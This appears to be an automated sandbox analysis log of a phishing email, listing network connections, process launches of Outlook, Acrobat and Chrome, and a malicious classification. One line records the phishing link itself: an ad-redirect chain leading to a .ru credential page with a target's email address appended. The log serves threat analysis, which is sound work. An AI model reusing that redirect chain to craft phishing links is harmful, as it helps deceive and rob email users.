921f66f36c3c659d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1696&rtt_var=638&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1747&delivery_rate=1721698&cwnd=131&unsent_bytes=0&cid=7df4f0bf63322d9b&ts=543&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 20:57:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oW4gvdo6lzrqzxYZ57Q9%2FtBDtzFxJGX4RkBOdbWlJ0q5GGBIueEXCYpTSofRAabvTgKi8twAEI8BYcjFSz%2B16d0etvWeikokJTeTyhVA2Q1cSmBXbyjOib1pdPZJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=888&min_rtt=839&rtt_var=267&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2093&delivery_rate=4627002&cwnd=253&unsent_bytes=0&cid=53f2a5fdb7bed747&ts=270&x=0"Server: cloudflareCF-RAY: 921f6710efac8c96-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=10288&min_rtt=1991&rtt_var=5854&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1759&delivery_rate=1466599&cwnd=190&unsent_bytes=0&cid=4a865e4fb76df224&ts=587&x=0"
                Source: chromecache_196.9.drString found in binary or memory: http://github.com/fent/randexp.js/raw/master/LICENSE
                Source: chromecache_196.9.drString found in binary or memory: https://github.com/fent)
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownHTTPS traffic detected: 142.250.185.162:443 -> 192.168.2.17:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.185.162:443 -> 192.168.2.17:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.17:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.17:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.17:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.17:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.17:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.17:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.17:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.17:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49748 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.17:49761 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.120:443 -> 192.168.2.17:49763 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.120:443 -> 192.168.2.17:49762 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.17:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.120:443 -> 192.168.2.17:49781 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.17:49784 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.17:49790 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.17:49795 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.49.96:443 -> 192.168.2.17:49797 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.17:49796 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.49.96:443 -> 192.168.2.17:49798 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.253.42:443 -> 192.168.2.17:49812 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.253.42:443 -> 192.168.2.17:49809 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.253.42:443 -> 192.168.2.17:49810 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.253.42:443 -> 192.168.2.17:49811 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.253.42:443 -> 192.168.2.17:49808 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.217.16.132:443 -> 192.168.2.17:49817 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49822 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.17:49834 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.17:49832 version: TLS 1.2
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7156_822129401Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7156_822129401Jump to behavior
                Source: classification engineClassification label: mal100.phis.evad.winEML@39/132@46/20
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmpJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250317T1656500495-7128.etlJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\437cb98f-02e6-3095-7a14-f6ed0fcbd9b6.eml"
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A8B1DF91-FAA1-4626-8EBB-BE10763A7B74" "55A4E9CA-0F78-426E-87F2-28A0B4618F5B" "7128" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H60H1VPO\Due-Invoice-edcodistributing.com.pdf"
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1616 --field-trial-handle=1372,i,14397360767861381032,14619791995666054004,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://adclick.g.doubleclick.net/pcs/click?ref={{RANDOM_STRING}}&id=Y41515N2435yMX419snVO7695-2024-McWAN324SCAN&token={{RANDOM_STRING}}&adurl=https%3A%2F%2Fadclick.g.doubleclick.net%2Fpcs%2Fclick%3Fref%3D{{RANDOM_STRING}}%26id%3DY41515N2435yMX419snVO7695-2024-McWAN324SCAN%26adurl%3Dhttps%3A%2F%2F2025_Notificationx1Invoice_Review.fmhjhctk.ru%2FaNAtEaDInodo%2F%23Yjohng@edcodistributing.com
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,15469999777749754854,18021194746910479268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2108 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A8B1DF91-FAA1-4626-8EBB-BE10763A7B74" "55A4E9CA-0F78-426E-87F2-28A0B4618F5B" "7128" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"Jump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H60H1VPO\Due-Invoice-edcodistributing.com.pdf"Jump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1616 --field-trial-handle=1372,i,14397360767861381032,14619791995666054004,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,15469999777749754854,18021194746910479268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2108 /prefetch:3Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
